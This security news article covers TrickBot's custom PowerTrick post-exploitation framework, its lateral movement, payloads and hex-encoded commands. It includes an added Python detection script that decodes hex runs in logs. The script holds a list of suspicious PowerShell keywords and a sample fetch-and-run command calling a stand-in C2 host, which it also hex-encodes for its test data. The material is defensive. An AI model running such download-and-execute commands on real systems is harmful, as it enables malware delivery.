TrickBot Gang Created a Custom Post-Exploitation Framework

Instead of relying on premade and well-known toolkits, the threat actors behind the TrickBot trojan decided to develop a private post-exploitation toolkit called PowerTrick to spread malware laterally throughout a network.

When an attacker gains access to a victim’s network, they will attempt to quietly gain access to user and administrator credentials and then laterally spread to the other devices on the network.

This type of lateral movement is typically done through post-exploitation toolkits or frameworks, such as PowerShell Empire, that make it easier to harvest credentials, execute commands on computers, and deploy malware.

It starts with a backdoor

To generate the most revenue during a network compromise, TrickBot has started to focus more on the enterprise environment with the release of new modules and by partnering with the Ryuk ransomware actors.

“TrickBot has shifted focus to enterprise environments over the years to incorporate everything from network profiling, mass data collection, incorporation of lateral traversal exploits. This focus shift is also prevalent in their incorporation of malware and techniques in their tertiary deliveries that are targeting enterprise environments. It is similar to a company where the focus shifts depending on what generates the best revenue,” the SentinelLabs researchers explained in a new report shared with BleepingComputer.

PowerTrick is a fileless post-exploitation framework developed by the TrickBot actors that allows its operators to perform stealthy and persistent reconnaissance and lateral compromises inside networks that have been determined to be of high value.

PowerTrick Human Network Exploitation Operator
(Source: SentinelLabs)

While post-exploitation frameworks such as PowerShell Empire already exist, the TrickBot actors decided to create a private framework to evade detection and to have a tool that satisfies their own particular needs.

“Lots of discourse was about OSINT offensive tools used by malware operators – here, the TrickBot actors used their own tools to evade detection,” Vitali Kremez, Head of SentinelLabs, told BleepingComputer.

Similar to PowerShell Empire, on networks where PowerTrick is deployed, the initial “staging” program will download a more feature-rich backdoor that allows the attacker to execute further PowerShell commands, harvest credentials, install additional backdoors, and spread laterally throughout the network.

PowerTrick Payloads
(Source: SentinelLabs)

Some of the tools seen being installed by PowerTrick include the TrickBot Anchor malware and the ‘More_Eggs’ JavaScript backdoor. These tools are installed through the PowerTrick reverse shell by executing PowerShell commands that download the software.

Anchor download command

In addition to the malware payloads, PowerTrick also allows the actor to issue commands that are ‘hexified’ to bypass security solutions.

Direct shell commands
(Source: SentinelLabs)
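
For defenders, one way to surface hexified commands in process or script-block logs is to decode long hex runs and inspect what they contain. The following is an added example, not code from SentinelLabs or the original article; it assumes ‘hexified’ means two hex digits per command byte, and the function names, keyword list and sample log lines are constructed for illustration.

```python
import re
import string

# Assumption: "hexified" means each command byte is written as two hex digits,
# optionally prefixed with 0x and separated by spaces or commas.
HEX_RUN = re.compile(r"(?<![0-9A-Za-z])(?:(?:0x)?[0-9A-Fa-f]{2}[\s,]?){12,}")
HEX_PAIR = re.compile(r"(?:0x)?([0-9A-Fa-f]{2})")
# Hypothetical triage keywords; tune to your environment.
SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-expression", "iex",
              "net.webclient", "start-process")
PRINTABLE = set(string.printable.encode())


def decode_hex_runs(line, min_printable=0.9):
    """Decode hex runs in a log line, keeping only mostly-printable results."""
    results = []
    for match in HEX_RUN.finditer(line):
        raw = bytes.fromhex("".join(HEX_PAIR.findall(match.group(0))))
        ratio = sum(b in PRINTABLE for b in raw) / len(raw)
        if ratio >= min_printable:  # hashes and binary blobs fall below this
            results.append(raw.decode("ascii", errors="replace"))
    return results


def scan(lines):
    """Return (line_number, decoded_text, matched_keywords) per decoded run."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for text in decode_hex_runs(line):
            hits = [k for k in SUSPICIOUS if k in text.lower()]
            findings.append((number, text, hits))
    return findings


# Constructed sample data (not taken from the SentinelLabs report).
SAMPLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/x')"
SAMPLE_LOG = [
    'powershell.exe -nop -w hidden -c "whoami /all"',
    "cmd.exe /c echo " + SAMPLE_CMD.encode().hex(),
    "file hash e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
]

if __name__ == "__main__":
    for number, text, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {text!r} keywords={hits}")
```

The printable-ratio check is what keeps file hashes and other binary hex out of the results, so only runs that decode to readable text reach the keyword triage.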

Because PowerShell Empire and other well-known post-exploitation frameworks are commonly detected by security solutions, creating a private fileless framework lets the TrickBot actors evade these solutions.

“The top-tier cybercrime enterprise offensive tooling such as “PowerTrick” is flexible and effective which allows the TrickBot cybercrime actors to leverage them to augment on the fly and stay stealthy as opposed to using larger more open source systems such as PowerShell Empire,” Kremez told BleepingComputer. “The end-goal of the PowerTrick backdoor and its approach is to bypass restrictions and security controls to adapt to the new age of security controls and exploit the most protected and secure high-value networks.”

Fake PowerTrick C2 created for testing network security

To assist organizations in testing their network security against PowerTrick, SentinelLabs has created a mock command and control panel and various PowerShell commands that emulate PowerTrick communication.

Using this mock panel and the PowerShell commands, organizations can test their network security solutions against the PowerTrick communication to make sure it is detected.

To further help, SentinelLabs has created a variety of Suricata rules that can be used to detect malicious traffic associated with this framework.
